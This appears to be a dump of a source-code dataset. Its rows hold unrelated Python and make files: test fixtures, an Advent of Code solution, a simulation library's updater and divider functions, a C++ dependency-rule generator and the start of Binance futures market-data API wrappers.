hexsha
stringlengths
40
40
size
int64
7
1.04M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
247
max_stars_repo_name
stringlengths
4
125
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
listlengths
1
10
max_stars_count
int64
1
368k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
247
max_issues_repo_name
stringlengths
4
125
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
listlengths
1
10
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
247
max_forks_repo_name
stringlengths
4
125
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
listlengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
1
1.04M
avg_line_length
float64
1.77
618k
max_line_length
int64
1
1.02M
alphanum_fraction
float64
0
1
original_content
stringlengths
7
1.04M
filtered:remove_function_no_docstring
int64
-102
942k
filtered:remove_class_no_docstring
int64
-354
977k
filtered:remove_delete_markers
int64
0
60.1k
12b135466c5c850993528becc6050f17c4230012
1,906
py
Python
itests/client_fixtures.py
skivis/BlackSheep
486f04ba2045f31dd3e188f52c45a275eb150967
[ "MIT" ]
1
2021-04-28T14:42:26.000Z
2021-04-28T14:42:26.000Z
itests/client_fixtures.py
skivis/BlackSheep
486f04ba2045f31dd3e188f52c45a275eb150967
[ "MIT" ]
null
null
null
itests/client_fixtures.py
skivis/BlackSheep
486f04ba2045f31dd3e188f52c45a275eb150967
[ "MIT" ]
null
null
null
from itests.utils import get_sleep_time from blacksheep.client.pool import ClientConnectionPools import os import pathlib import asyncio from multiprocessing import Process from time import sleep import pytest from blacksheep.client import ClientSession from .flask_app import app @pytest.fixture(scope="session") def event_loop(): """Create an instance of the default event loop for all test cases.""" loop = asyncio.get_event_loop_policy().new_event_loop() yield loop loop.close() @pytest.fixture(scope="module") @pytest.fixture(scope="module") @pytest.fixture(scope="module") @pytest.fixture(scope="module") @pytest.fixture(scope="module", autouse=True)
24.753247
81
0.718258
from itests.utils import get_sleep_time from blacksheep.client.pool import ClientConnectionPools import os import pathlib import asyncio from multiprocessing import Process from time import sleep import pytest from blacksheep.client import ClientSession from .flask_app import app def get_static_path(file_name): static_folder_path = pathlib.Path(__file__).parent.absolute() / "static" return os.path.join(str(static_folder_path), file_name.lstrip("/")) @pytest.fixture(scope="session") def event_loop(): """Create an instance of the default event loop for all test cases.""" loop = asyncio.get_event_loop_policy().new_event_loop() yield loop loop.close() @pytest.fixture(scope="module") def server_host(): return "127.0.0.1" @pytest.fixture(scope="module") def server_port(): return 44777 @pytest.fixture(scope="module") def session(server_host, server_port, event_loop): # It is important to pass the instance of ClientConnectionPools, # to ensure that the connections are reused and closed session = ClientSession( loop=event_loop, base_url=f"http://{server_host}:{server_port}", pools=ClientConnectionPools(event_loop), ) yield session asyncio.run(session.close()) @pytest.fixture(scope="module") def session_alt(event_loop): session = ClientSession( loop=event_loop, default_headers=[(b"X-Default-One", b"AAA"), (b"X-Default-Two", b"BBB")], ) yield session event_loop.run_until_complete(session.close()) def start_server(): print(f"[*] Flask app listening on 0.0.0.0:44777") app.run(host="127.0.0.1", port=44777) @pytest.fixture(scope="module", autouse=True) def server(server_host, server_port): server_process = Process(target=start_server) server_process.start() sleep(get_sleep_time()) yield 1 sleep(1.2) server_process.terminate()
1,060
0
156
9afbe23daffa1d6b64b319da9bb5fb508db62891
673
py
Python
2021/day6.py
astonshane/AdventOfCode
25c7380e73eede3f79287de6a9dedc8314ab7965
[ "MIT" ]
null
null
null
2021/day6.py
astonshane/AdventOfCode
25c7380e73eede3f79287de6a9dedc8314ab7965
[ "MIT" ]
null
null
null
2021/day6.py
astonshane/AdventOfCode
25c7380e73eede3f79287de6a9dedc8314ab7965
[ "MIT" ]
null
null
null
print("part1:", iterate(80)) print("part2:", iterate(256))
29.26087
66
0.456166
def iterate(days): with open("inputs/day6.txt") as f: input = [int(x) for x in f.readline().strip().split(",")] fish = {} for f in input: fish[f] = fish.get(f, 0) + 1 for day in range(1, days+1): new_fish = {} for x in fish: if x == 0: new_fish[6] = new_fish.get(6,0) + fish[x] new_fish[8] = fish[x] else: new_fish[x-1] = new_fish.get(x-1, 0) + fish[x] fish = new_fish fish_count = sum(fish.values()) return fish_count print("part1:", iterate(80)) print("part2:", iterate(256))
591
0
22
cfe8552d61b7b191dc8c08bf956d94364e70490c
7,322
py
Python
vivarium/core/repository.py
U8NWXD/vivarium
19c6a4096fe94e3342e40ce03e6708c24dd38fa3
[ "MIT" ]
null
null
null
vivarium/core/repository.py
U8NWXD/vivarium
19c6a4096fe94e3342e40ce03e6708c24dd38fa3
[ "MIT" ]
null
null
null
vivarium/core/repository.py
U8NWXD/vivarium
19c6a4096fe94e3342e40ce03e6708c24dd38fa3
[ "MIT" ]
null
null
null
""" ============================================== Repository of Updaters, Dividers, and Derivers ============================================== You should interpret words and phrases that appear fully capitalized in this document as described in :rfc:`2119`. Here is a brief summary of the RFC: * "MUST" indicates absolute requirements. Vivarium may not work correctly if you don't follow these. * "SHOULD" indicates strong suggestions. You might have a valid reason for deviating from them, but be careful that you understand the ramifications. * "MAY" indicates truly optional features that you can include or exclude as you wish. -------- Updaters -------- Each :term:`updater` is defined as a function whose name begins with ``update_``. Vivarium uses these functions to apply :term:`updates` to :term:`variables`. Updater names are defined in :py:data:`updater_library`, which maps these names to updater functions. Updater API =========== An updater function MUST have a name that begins with ``update_``. The function MUST accept exactly two positional arguments: the first MUST be the current value of the variable (i.e. before applying the update), and the second MUST be the value associated with the variable in the update. The function SHOULD not accept any other parameters. The function MUST return the updated value of the variable only. -------- Dividers -------- Each :term:`divider` is defined by a function that follows the API we describe below. Vivarium uses these dividers to generate daughter cell states from the mother cell's state. Divider names are defined in :py:data:`divider_library`, which maps these names to divider functions. Divider API =========== Each divider function MUST have a name prefixed with ``_divide``. The function MUST accept a single positional argument, the value of the variable in the mother cell. It SHOULD accept no other arguments. The function MUST return a :py:class:`list` with two elements: the values of the variables in each of the daughter cells. .. note:: Dividers MAY not be deterministic and MAY not be symmetric. For example, a divider splitting an odd, integer-valued value may randomly decide which daughter cell receives the remainder. -------- Derivers -------- Each :term:`deriver` is defined as a separate :term:`process`, but here deriver names are mapped to processes by :py:data:`deriver_library`. The available derivers are: * **mmol_to_counts**: :py:class:`vivarium.processes.derive_counts.DeriveCounts` * **counts_to_mmol**: :py:class:`vivarium.processes.derive_concentrations.DeriveConcentrations` * **mass**: :py:class:`vivarium.processes.tree_mass.TreeMass` * **globals**: :py:class:`vivarium.processes.derive_globals.DeriveGlobals` See the documentation for each :term:`process class` for more details on that deriver. """ from __future__ import absolute_import, division, print_function import copy import random import numpy as np from vivarium.library.dict_utils import deep_merge from vivarium.library.units import Quantity # deriver processes from vivarium.processes.derive_concentrations import DeriveConcentrations from vivarium.processes.derive_counts import DeriveCounts from vivarium.processes.derive_globals import DeriveGlobals from vivarium.processes.tree_mass import TreeMass ## updater functions def update_merge(current_value, new_value): """Merge Updater Arguments: current_value (dict): new_value (dict): Returns: dict: The merger of ``current_value`` and ``new_value``. For any shared keys, the value in ``new_value`` is used. """ update = current_value.copy() for k, v in current_value.items(): new = new_value.get(k) if isinstance(new, dict): update[k] = deep_merge(dict(v), new) else: update[k] = new return update def update_set(current_value, new_value): """Set Updater Returns: The value provided in ``new_value``. """ return new_value def update_accumulate(current_value, new_value): """Accumulate Updater Returns: The sum of ``current_value`` and ``new_value``. """ return current_value + new_value #: Maps updater names to updater functions updater_library = { 'accumulate': update_accumulate, 'set': update_set, 'merge': update_merge} ## divider functions def divide_set(state): """Set Divider Returns: A list ``[state, state]``. No copying is performed. """ return [state, state] def divide_split(state): """Split Divider Arguments: state: Must be an :py:class:`int`, a :py:class:`float`, or a :py:class:`str` of value ``Infinity``. Returns: A list, each of whose elements contains half of ``state``. If ``state`` is an :py:class:`int`, the remainder is placed at random in one of the two elements. If ``state`` is infinite, the return value is ``[state, state]`` (no copying is done). Raises: Exception: if ``state`` is of an unrecognized type. """ if isinstance(state, int): remainder = state % 2 half = int(state / 2) if random.choice([True, False]): return [half + remainder, half] else: return [half, half + remainder] elif state == float('inf') or state == 'Infinity': # some concentrations are considered infinite in the environment # an alternative option is to not divide the local environment state return [state, state] elif isinstance(state, (float, Quantity)): half = state/2 return [half, half] else: raise Exception('can not divide state {} of type {}'.format(state, type(state))) def divide_zero(state): """Zero Divider Returns: ``[0, 0]`` regardless of input """ return [0, 0] def divide_split_dict(state): """Split-Dictionary Divider Returns: A list of two dictionaries. The first dictionary stores the first half of the key-value pairs in ``state``, and the second dictionary stores the rest of the key-value pairs. .. note:: Since dictionaries are unordered, you should avoid making any assumptions about which keys will be sent to which daughter cell. """ if state is None: state = {} d1 = dict(list(state.items())[len(state) // 2:]) d2 = dict(list(state.items())[:len(state) // 2]) return [d1, d2] #: Maps divider names to divider functions divider_library = { 'set': divide_set, 'split': divide_split, 'split_dict': divide_split_dict, 'zero': divide_zero} # Derivers #: Maps deriver names to :term:`process classes` deriver_library = { 'mmol_to_counts': DeriveCounts, 'counts_to_mmol': DeriveConcentrations, 'mass': TreeMass, 'globals': DeriveGlobals, } # Serializers serializer_library = { 'numpy': NumpySerializer(), }
29.643725
88
0.680688
""" ============================================== Repository of Updaters, Dividers, and Derivers ============================================== You should interpret words and phrases that appear fully capitalized in this document as described in :rfc:`2119`. Here is a brief summary of the RFC: * "MUST" indicates absolute requirements. Vivarium may not work correctly if you don't follow these. * "SHOULD" indicates strong suggestions. You might have a valid reason for deviating from them, but be careful that you understand the ramifications. * "MAY" indicates truly optional features that you can include or exclude as you wish. -------- Updaters -------- Each :term:`updater` is defined as a function whose name begins with ``update_``. Vivarium uses these functions to apply :term:`updates` to :term:`variables`. Updater names are defined in :py:data:`updater_library`, which maps these names to updater functions. Updater API =========== An updater function MUST have a name that begins with ``update_``. The function MUST accept exactly two positional arguments: the first MUST be the current value of the variable (i.e. before applying the update), and the second MUST be the value associated with the variable in the update. The function SHOULD not accept any other parameters. The function MUST return the updated value of the variable only. -------- Dividers -------- Each :term:`divider` is defined by a function that follows the API we describe below. Vivarium uses these dividers to generate daughter cell states from the mother cell's state. Divider names are defined in :py:data:`divider_library`, which maps these names to divider functions. Divider API =========== Each divider function MUST have a name prefixed with ``_divide``. The function MUST accept a single positional argument, the value of the variable in the mother cell. It SHOULD accept no other arguments. The function MUST return a :py:class:`list` with two elements: the values of the variables in each of the daughter cells. .. note:: Dividers MAY not be deterministic and MAY not be symmetric. For example, a divider splitting an odd, integer-valued value may randomly decide which daughter cell receives the remainder. -------- Derivers -------- Each :term:`deriver` is defined as a separate :term:`process`, but here deriver names are mapped to processes by :py:data:`deriver_library`. The available derivers are: * **mmol_to_counts**: :py:class:`vivarium.processes.derive_counts.DeriveCounts` * **counts_to_mmol**: :py:class:`vivarium.processes.derive_concentrations.DeriveConcentrations` * **mass**: :py:class:`vivarium.processes.tree_mass.TreeMass` * **globals**: :py:class:`vivarium.processes.derive_globals.DeriveGlobals` See the documentation for each :term:`process class` for more details on that deriver. """ from __future__ import absolute_import, division, print_function import copy import random import numpy as np from vivarium.library.dict_utils import deep_merge from vivarium.library.units import Quantity # deriver processes from vivarium.processes.derive_concentrations import DeriveConcentrations from vivarium.processes.derive_counts import DeriveCounts from vivarium.processes.derive_globals import DeriveGlobals from vivarium.processes.tree_mass import TreeMass ## updater functions def update_merge(current_value, new_value): """Merge Updater Arguments: current_value (dict): new_value (dict): Returns: dict: The merger of ``current_value`` and ``new_value``. For any shared keys, the value in ``new_value`` is used. """ update = current_value.copy() for k, v in current_value.items(): new = new_value.get(k) if isinstance(new, dict): update[k] = deep_merge(dict(v), new) else: update[k] = new return update def update_set(current_value, new_value): """Set Updater Returns: The value provided in ``new_value``. """ return new_value def update_accumulate(current_value, new_value): """Accumulate Updater Returns: The sum of ``current_value`` and ``new_value``. """ return current_value + new_value #: Maps updater names to updater functions updater_library = { 'accumulate': update_accumulate, 'set': update_set, 'merge': update_merge} ## divider functions def divide_set(state): """Set Divider Returns: A list ``[state, state]``. No copying is performed. """ return [state, state] def divide_split(state): """Split Divider Arguments: state: Must be an :py:class:`int`, a :py:class:`float`, or a :py:class:`str` of value ``Infinity``. Returns: A list, each of whose elements contains half of ``state``. If ``state`` is an :py:class:`int`, the remainder is placed at random in one of the two elements. If ``state`` is infinite, the return value is ``[state, state]`` (no copying is done). Raises: Exception: if ``state`` is of an unrecognized type. """ if isinstance(state, int): remainder = state % 2 half = int(state / 2) if random.choice([True, False]): return [half + remainder, half] else: return [half, half + remainder] elif state == float('inf') or state == 'Infinity': # some concentrations are considered infinite in the environment # an alternative option is to not divide the local environment state return [state, state] elif isinstance(state, (float, Quantity)): half = state/2 return [half, half] else: raise Exception('can not divide state {} of type {}'.format(state, type(state))) def divide_zero(state): """Zero Divider Returns: ``[0, 0]`` regardless of input """ return [0, 0] def divide_split_dict(state): """Split-Dictionary Divider Returns: A list of two dictionaries. The first dictionary stores the first half of the key-value pairs in ``state``, and the second dictionary stores the rest of the key-value pairs. .. note:: Since dictionaries are unordered, you should avoid making any assumptions about which keys will be sent to which daughter cell. """ if state is None: state = {} d1 = dict(list(state.items())[len(state) // 2:]) d2 = dict(list(state.items())[:len(state) // 2]) return [d1, d2] #: Maps divider names to divider functions divider_library = { 'set': divide_set, 'split': divide_split, 'split_dict': divide_split_dict, 'zero': divide_zero} def default_divide_condition(compartment): return False # Derivers #: Maps deriver names to :term:`process classes` deriver_library = { 'mmol_to_counts': DeriveCounts, 'counts_to_mmol': DeriveConcentrations, 'mass': TreeMass, 'globals': DeriveGlobals, } # Serializers class Serializer(object): def serialize(self, data): return data def deserialize(self, data): return data class NumpySerializer(Serializer): def serialize(self, data): return data.tolist() def deserialize(self, data): return np.array(data) serializer_library = { 'numpy': NumpySerializer(), }
161
17
174
c489189444952f919e3577efb4fb2967757abb02
591
py
Python
utils.py
doiken23/mccformers.pytorch
678bd9448e3a2f35bd408e8c8e510e0ea1f9a19f
[ "MIT" ]
1
2021-11-26T12:08:41.000Z
2021-11-26T12:08:41.000Z
utils.py
doiken23/mccformers.pytorch
678bd9448e3a2f35bd408e8c8e510e0ea1f9a19f
[ "MIT" ]
null
null
null
utils.py
doiken23/mccformers.pytorch
678bd9448e3a2f35bd408e8c8e510e0ea1f9a19f
[ "MIT" ]
null
null
null
import torch from torch import Tensor def compute_accuracy(pred: Tensor, gt: Tensor, ignore: int = 0): """ pred (torch.Tensor): predicted words shape of [L, N] gt (torch.Tensor): GT words shape of [L, N] ignore (int): ignored label """ mask = gt != ignore tp = torch.logical_and(pred == gt, mask) return tp.sum() / mask.sum()
22.730769
64
0.563452
import torch from torch import Tensor def compute_accuracy(pred: Tensor, gt: Tensor, ignore: int = 0): """ pred (torch.Tensor): predicted words shape of [L, N] gt (torch.Tensor): GT words shape of [L, N] ignore (int): ignored label """ mask = gt != ignore tp = torch.logical_and(pred == gt, mask) return tp.sum() / mask.sum() def decode_seq(seq, idx_to_word): words = [] for s in seq: if s == 2: # <START> continue if s == 3: # <END> break words.append(idx_to_word[s]) return ' '.join(words)
206
0
23
e1ef75ea90706b3fa5441badf9e317871b169654
96
py
Python
service-cfg-mgnt/ansible_app/apps.py
pfroelke/Confne
bd7771fdd3c6e59ec0f327ba2b9d72d31cb8e582
[ "MIT" ]
null
null
null
service-cfg-mgnt/ansible_app/apps.py
pfroelke/Confne
bd7771fdd3c6e59ec0f327ba2b9d72d31cb8e582
[ "MIT" ]
14
2021-03-30T14:26:53.000Z
2022-03-02T10:40:40.000Z
service-cfg-mgnt/ansible_app/apps.py
pfroelke/Confnetti
bd7771fdd3c6e59ec0f327ba2b9d72d31cb8e582
[ "MIT" ]
null
null
null
from django.apps import AppConfig
16
34
0.770833
from django.apps import AppConfig class AnsibleAppConfig(AppConfig): name = "ansible_app"
0
38
23
5749762850ea7ecd0b18114c1bb163d34428e1e5
6,295
py
Python
python-ref/python-make/cxx_sources_deps_rules.py
bogen/makeshells
a61ca2f9d35417d081a5c07c6c973d6039d39c38
[ "MIT" ]
1
2019-10-16T12:15:53.000Z
2019-10-16T12:15:53.000Z
python-ref/python-make/cxx_sources_deps_rules.py
bogen/makeshells
a61ca2f9d35417d081a5c07c6c973d6039d39c38
[ "MIT" ]
null
null
null
python-ref/python-make/cxx_sources_deps_rules.py
bogen/makeshells
a61ca2f9d35417d081a5c07c6c973d6039d39c38
[ "MIT" ]
null
null
null
# this is a make/python hybrid file # Normal make files are a make/sh hybrid. # This makefile uses python instead of sh (or bash) test_cxx_sources ?= checkcxxsources $(cxxsources):$(out_init) $(origin) if (this == "checkcxxsources") and (not os.path.exists(env.cxxsources)): leave() caption() if (this == env.cxxsources): lib_cxx, main_cxx = [],[] quote = "'" else: quote = "" test_cxx=[] for root, dirs, files in os.walk(env.cxxsrc) : for file in files: if file.endswith(".cxx"): cxx = quote+os.path.join(root, file)+quote if root.endswith("/main"): if (this == env.cxxsources): lib_cxx.append(cxx); main_cxx.append(cxx) test_cxx.append(cxx) elif root.endswith("/test"): test_cxx.append(cxx) test_cxx.sort() if (this == env.cxxsources): lib_cxx.sort() main_cxx.sort() with open (this, "w") as f: f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this)) f.write("lib_cxx_sources := %s\n\n" % (",".join(lib_cxx))) f.write("main_cxx_sources := %s\n\n" % (",".join(main_cxx))) f.write("test_cxx_sources := %s\n\n" % (",".join(test_cxx))) leave() before = set([$(test_cxx_sources)]) after = set(test_cxx) removed = str(before-after).replace(root_prefix,"") added = str(after-before).replace(root_prefix,"") removals = removed != "set()" additions = added != "set()" if removals or additions: print ("cxx source files were added or removed\n") if removals: print("removals:", removed) if additions: print("additions:", added) print ("\nForcing dependency and rule regeneration and re-link.\n") run(env.MAKE, "re-dep") cxx_dep0 := $(CXX), "-E", "--trace-includes", $(DEP_CXX_FLAGS) cxx_dep1 := "-I$(cxxinc)", cxx, "-o/dev/null" cxx_dep := $(cxx_dep0), $(cxx_dep1) $(cxxdeps): $(cxxsources);$(caption) queues, process = [],[] fd_a=types.SimpleNamespace() fd_a.gorge = gorge fd_a.root = root_prefix_len prefix = "test_cxx_sources := " prefix_len = len(prefix) with open(first) as f: lines = f.readlines() for line in lines: if line.startswith(prefix): sources = line[prefix_len:].rstrip() test_cxx = sources.split(",") for _cxx in test_cxx: cxx = _cxx.replace("'","") q = multiprocessing.Queue() p = multiprocessing.Process(target=find_dep, args=(cxx, q, fd_a)) process.append(p) queues.append(q) p.start() break with open (this, "w") as f: f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this)) n = 1 for q in queues: obj = q.get() deps = q.get() f.write("\n# %d\n%s := " % (n, obj)) f.write(" ".join(deps)) f.write("\n") n+=1 for p in process: p.join() $(objrules): $(cxxdeps); $(caption) suffix = "_obj_deps" prefix = "cxxsrc_" main_prefix = prefix + "main_" test_prefix = prefix + "test_" sep = " := " sep_len = len(sep) prefix_len = len(prefix) main_obj0, test_obj0, lib_obj0 = [],[],[] main_objs, test_objs, lib_objs = {},{},{} cxx_ext = ".cxx" cxx_ext_len = len(cxx_ext) with open(first) as f: lines = f.readlines() for line in lines: if line.startswith(prefix): i = line.find(sep) if i == -1: raise RuntimeError("Source deps line not formatted correctly") deps = line[:i] sources = line [i+sep_len:] j = sources.find(cxx_ext)+cxx_ext_len if j == -1: raise RuntimeError("Source deps line not formatted correctly") cxxfile = sources[root_prefix_len:j] cxxfile_i = "need to work on ctfe wrapper..." deps1 = deps.replace(suffix,".o") deps1 = deps1.replace("cxxsrc","$$(obj)") deps1 = deps1.replace("_","/",2) obj = deps1 if deps.startswith(main_prefix): lib_obj = obj.replace("$$(obj)/main","$$(obj)/lib") test_obj = obj.replace("$$(obj)/main/","$$(obj)/test/main__") main_objs[obj] = (cxxfile,deps,cxxfile_i) lib_objs[lib_obj] = (cxxfile,deps,cxxfile_i) test_objs[test_obj] = (cxxfile,deps,cxxfile_i) main_obj0.append(obj) lib_obj0.append(lib_obj) test_obj0.append(test_obj) continue if deps.startswith(test_prefix): test_objs[obj] = (cxxfile,deps,cxxfile_i) test_obj0.append(obj) with open (this, "w") as f: f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this)) f.write("\nmain_exe_objects := %s\n" % (" ".join(main_obj0))) f.write("\nlib_so_objects := %s\n" % (" ".join(lib_obj0))) f.write("\ntest_exe_objects := %s\n" % (" ".join(test_obj0))) f.write("\n__main_exe_objects__ := %s\n" % (make_quoted_list(main_obj0))) f.write("\n__lib_so_objects__ := %s\n" % (make_quoted_list(lib_obj0))) f.write("\n__test_exe_objects__ := %s\n" % (make_quoted_list(test_obj0))) ipch = "'-include-pch'," rule = "$$(__CXX_FLAGS), '-c', '$$<', '-o$$@'" main = ipch + "'$$(main_sysheaders_pch)'," + rule + ", $$(MAIN_EXTRA)" test = ipch + "'$$(test_sysheaders_pch)'," + rule + ", $$(TEST_EXTRA)" lib = ipch + "'$$(lib_sysheaders_pch)'," + rule + ", $$(LIB_EXTRA)" cxx = "$$(CXX)" main_d = "$$(obj_main_init) $$(main_sysheaders_pch)" lib_d = "$$(obj_lib_init) $$(lib_sysheaders_pch)" test_d = "$$(obj_test_init) $$(test_sysheaders_pch)" target("main", main_objs, main, cxx, main_d, f) target("lib", lib_objs, lib, cxx, lib_d, f) target("test", test_objs, test, cxx, test_d, f)
34.211957
82
0.58189
# this is a make/python hybrid file # Normal make files are a make/sh hybrid. # This makefile uses python instead of sh (or bash) test_cxx_sources ?= checkcxxsources $(cxxsources):$(out_init) $(origin) if (this == "checkcxxsources") and (not os.path.exists(env.cxxsources)): leave() caption() if (this == env.cxxsources): lib_cxx, main_cxx = [],[] quote = "'" else: quote = "" test_cxx=[] for root, dirs, files in os.walk(env.cxxsrc) : for file in files: if file.endswith(".cxx"): cxx = quote+os.path.join(root, file)+quote if root.endswith("/main"): if (this == env.cxxsources): lib_cxx.append(cxx); main_cxx.append(cxx) test_cxx.append(cxx) elif root.endswith("/test"): test_cxx.append(cxx) test_cxx.sort() if (this == env.cxxsources): lib_cxx.sort() main_cxx.sort() with open (this, "w") as f: f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this)) f.write("lib_cxx_sources := %s\n\n" % (",".join(lib_cxx))) f.write("main_cxx_sources := %s\n\n" % (",".join(main_cxx))) f.write("test_cxx_sources := %s\n\n" % (",".join(test_cxx))) leave() before = set([$(test_cxx_sources)]) after = set(test_cxx) removed = str(before-after).replace(root_prefix,"") added = str(after-before).replace(root_prefix,"") removals = removed != "set()" additions = added != "set()" if removals or additions: print ("cxx source files were added or removed\n") if removals: print("removals:", removed) if additions: print("additions:", added) print ("\nForcing dependency and rule regeneration and re-link.\n") run(env.MAKE, "re-dep") cxx_dep0 := $(CXX), "-E", "--trace-includes", $(DEP_CXX_FLAGS) cxx_dep1 := "-I$(cxxinc)", cxx, "-o/dev/null" cxx_dep := $(cxx_dep0), $(cxx_dep1) $(cxxdeps): $(cxxsources);$(caption) def find_dep(cxx, q, fd_a): deps = [] lines = str(fd_a.gorge($(cxx_dep))).split(r"\n") for line in lines: i = line.find("$(cxxinc)") if i != -1: deps.append(line[i:]) q.put(cxx[fd_a.root:].replace("/","_").replace(".cxx","_obj_deps")) q.put([cxx] + sorted(deps)) queues, process = [],[] fd_a=types.SimpleNamespace() fd_a.gorge = gorge fd_a.root = root_prefix_len prefix = "test_cxx_sources := " prefix_len = len(prefix) with open(first) as f: lines = f.readlines() for line in lines: if line.startswith(prefix): sources = line[prefix_len:].rstrip() test_cxx = sources.split(",") for _cxx in test_cxx: cxx = _cxx.replace("'","") q = multiprocessing.Queue() p = multiprocessing.Process(target=find_dep, args=(cxx, q, fd_a)) process.append(p) queues.append(q) p.start() break with open (this, "w") as f: f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this)) n = 1 for q in queues: obj = q.get() deps = q.get() f.write("\n# %d\n%s := " % (n, obj)) f.write(" ".join(deps)) f.write("\n") n+=1 for p in process: p.join() $(objrules): $(cxxdeps); $(caption) suffix = "_obj_deps" prefix = "cxxsrc_" main_prefix = prefix + "main_" test_prefix = prefix + "test_" sep = " := " sep_len = len(sep) prefix_len = len(prefix) main_obj0, test_obj0, lib_obj0 = [],[],[] main_objs, test_objs, lib_objs = {},{},{} cxx_ext = ".cxx" cxx_ext_len = len(cxx_ext) with open(first) as f: lines = f.readlines() for line in lines: if line.startswith(prefix): i = line.find(sep) if i == -1: raise RuntimeError("Source deps line not formatted correctly") deps = line[:i] sources = line [i+sep_len:] j = sources.find(cxx_ext)+cxx_ext_len if j == -1: raise RuntimeError("Source deps line not formatted correctly") cxxfile = sources[root_prefix_len:j] cxxfile_i = "need to work on ctfe wrapper..." deps1 = deps.replace(suffix,".o") deps1 = deps1.replace("cxxsrc","$$(obj)") deps1 = deps1.replace("_","/",2) obj = deps1 if deps.startswith(main_prefix): lib_obj = obj.replace("$$(obj)/main","$$(obj)/lib") test_obj = obj.replace("$$(obj)/main/","$$(obj)/test/main__") main_objs[obj] = (cxxfile,deps,cxxfile_i) lib_objs[lib_obj] = (cxxfile,deps,cxxfile_i) test_objs[test_obj] = (cxxfile,deps,cxxfile_i) main_obj0.append(obj) lib_obj0.append(lib_obj) test_obj0.append(test_obj) continue if deps.startswith(test_prefix): test_objs[obj] = (cxxfile,deps,cxxfile_i) test_obj0.append(obj) def target(label, objs, rule, cxx, dest, f): f.write("\n\n# %s\n" % label) for obj, pre in objs.items(): f.write("%s: $$(%s) %s\n $$(caption0);" % (obj, pre[1], dest)) f.write("""run(%s, '-D__CXX_SRCFILE__="%s"', %s)\n""" % (cxx, pre[0], rule)) f.write(" ## %s\n\n" % (pre[2])) def make_quoted_list(obj): return ",".join(map(lambda x: "'"+x+"'", obj)) with open (this, "w") as f: f.write("# === Generated by %s:%s ===\n\n" % (env.MAKEFILE_LIST, this)) f.write("\nmain_exe_objects := %s\n" % (" ".join(main_obj0))) f.write("\nlib_so_objects := %s\n" % (" ".join(lib_obj0))) f.write("\ntest_exe_objects := %s\n" % (" ".join(test_obj0))) f.write("\n__main_exe_objects__ := %s\n" % (make_quoted_list(main_obj0))) f.write("\n__lib_so_objects__ := %s\n" % (make_quoted_list(lib_obj0))) f.write("\n__test_exe_objects__ := %s\n" % (make_quoted_list(test_obj0))) ipch = "'-include-pch'," rule = "$$(__CXX_FLAGS), '-c', '$$<', '-o$$@'" main = ipch + "'$$(main_sysheaders_pch)'," + rule + ", $$(MAIN_EXTRA)" test = ipch + "'$$(test_sysheaders_pch)'," + rule + ", $$(TEST_EXTRA)" lib = ipch + "'$$(lib_sysheaders_pch)'," + rule + ", $$(LIB_EXTRA)" cxx = "$$(CXX)" main_d = "$$(obj_main_init) $$(main_sysheaders_pch)" lib_d = "$$(obj_lib_init) $$(lib_sysheaders_pch)" test_d = "$$(obj_test_init) $$(test_sysheaders_pch)" target("main", main_objs, main, cxx, main_d, f) target("lib", lib_objs, lib, cxx, lib_d, f) target("test", test_objs, test, cxx, test_d, f)
609
0
74
6d18fbcf0c4128657606560451cbb6b3b8077b66
20,036
py
Python
binance/delivery/market.py
AlfonsoAgAr/binance-futures-connector-python
f0bd2c7b0576503bf526ce6be329ca2dae90fefe
[ "MIT" ]
1
2022-01-29T14:37:47.000Z
2022-01-29T14:37:47.000Z
binance/delivery/market.py
sanjeevan121/binance-futures-connector-python
d820b73a15e9f64c80891a13694ca0c5d1693b90
[ "MIT" ]
null
null
null
binance/delivery/market.py
sanjeevan121/binance-futures-connector-python
d820b73a15e9f64c80891a13694ca0c5d1693b90
[ "MIT" ]
1
2022-02-25T16:23:41.000Z
2022-02-25T16:23:41.000Z
from binance.lib.utils import ( check_required_parameter, ) from binance.lib.utils import check_required_parameters def ping(self): """ | | **Test Connectivity** | *Test connectivity to the Rest API.* :API endpoint: ``GET /dapi/v1/ping`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#test-connectivity | """ url_path = "/dapi/v1/ping" return self.query(url_path) def time(self): """ | | **Check Server Time** | *Test connectivity to the Rest API and get the current server time.* :API endpoint: ``GET /dapi/v1/time`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#check-server-time | """ url_path = "/dapi/v1/time" return self.query(url_path) def exchange_info(self): """ | | **Exchange Information** | *Current exchange trading rules and symbol information* :API endpoint: ``GET /dapi/v1/exchangeInfo`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#exchange-information | """ url_path = "/dapi/v1/exchangeInfo" return self.query(url_path) def depth(self, symbol: str, **kwargs): """ | | **Get Orderbook** :API endpoint: ``GET /dapi/v1/depth`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#order-book :parameter symbol: string; the trading pair :parameter limit: optional int; limit the results. Default 500, valid limits: [5, 10, 20, 50, 100, 500, 1000]. | """ check_required_parameter(symbol, "symbol") params = {"symbol": symbol, **kwargs} return self.query("/dapi/v1/depth", params) def trades(self, symbol: str, **kwargs): """ | | **Get Recent Market Trades** :API endpoint: ``GET /dapi/v1/trades`` :API doc: https://binance-docs.github.io/apidocs/delivery/en/#recent-trades-list :parameter symbol: string; the trading pair :parameter limit: optional int; limit the results. Default 500, max 1000. | """ check_required_parameter(symbol, "symbol") params = {"symbol": symbol, **kwargs} return self.query("/dapi/v1/trades", params) def historical_trades(self, symbol: str, **kwargs): """ | | **Old Trade 